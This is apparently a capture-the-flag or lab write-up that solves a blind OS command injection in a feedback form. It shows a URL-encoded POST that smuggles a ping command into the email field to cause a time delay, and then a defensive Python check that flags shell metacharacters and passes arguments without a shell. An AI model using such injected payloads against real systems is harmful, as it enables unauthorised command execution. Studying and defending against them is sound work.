This lab contains a blind OS command injection vulnerability in the feedback function.
⚠️ The application executes a shell command containing user-supplied input, but the output is not returned in the response.
Cause a 10-second delay by exploiting the command injection.
We’ll test the vulnerability by injecting into the email or subject fields.
The objective is to make the server delay its response by about 10 seconds by injecting a command such as ping with a 10-packet count.
We first send the payload unencoded in the email field:
csrf=...&email=hacker@gmail.com&ping -c10 127.0.0.1 &&subject=nothing&message=nothing
❌ No delay observed: the unencoded & is treated as a parameter separator when the body is parsed, so the injected command never reaches the shell as part of the email value.
We now URL-encode the payload (select it and press Ctrl+U in Burp Suite) so that the special characters survive parsing and are passed through to the shell.
📥 Final POST request
csrf=MBSoAfHwuv7NeOU9lPrhDmsxpoYe9Wbk&name=hacker
&email=hacker%40gmail.com%26ping+-c10+127.0.0.1+%26
&subject=nothing
&message=nothing
🔁 Submit this encoded request via Burp Suite Repeater; a response that takes roughly 10 seconds to arrive confirms the injection.
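As an added example (not part of this write-up), a defender-side check that URL-decodes a body shaped like the lab's final POST, flags fields carrying shell metacharacters, and shows how the email value should be handed to a command so that no shell ever parses it. The CSRF token is a placeholder and the mail command is a hypothetical notification binary.

```python
"""Added example: decode the feedback POST body and check each field
for shell metacharacters before any command is built from it."""
import re
from urllib.parse import parse_qs

# Constructed request body, shaped like the lab's final POST (token is a placeholder).
SAMPLE_BODY = (
    "csrf=PLACEHOLDER_TOKEN&name=hacker"
    "&email=hacker%40gmail.com%26ping+-c10+127.0.0.1+%26"
    "&subject=nothing&message=nothing"
)

# Characters a POSIX shell interprets: separators, pipes, substitution, redirection.
SHELL_META = re.compile(r"[;&|`$<>\n\r()]")
# Deliberately strict allow-list for the email field.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def decode_form(body):
    """URL-decode an application/x-www-form-urlencoded body into {field: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def flag_injection_fields(fields):
    """Return the names of fields whose decoded value contains shell metacharacters.
    Useful as a WAF rule or as a log-review check on submitted feedback forms."""
    return sorted(name for name, value in fields.items() if SHELL_META.search(value))


def is_valid_email(value):
    return bool(EMAIL_RE.fullmatch(value))


def build_notify_argv(email):
    """Hardened form: validate the field against an allow-list, then place it in
    its own argv element so subprocess runs it without a shell. The vulnerable
    pattern this replaces is string concatenation into os.system()/shell=True."""
    if not is_valid_email(email):
        raise ValueError("rejected email field")
    # Hypothetical notification command; pass argv as a list, never a shell string.
    return ["/usr/bin/mail", "-s", "New feedback", email]


if __name__ == "__main__":
    fields = decode_form(SAMPLE_BODY)
    print("decoded email field:", repr(fields["email"]))
    print("fields with shell metacharacters:", flag_injection_fields(fields))
```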
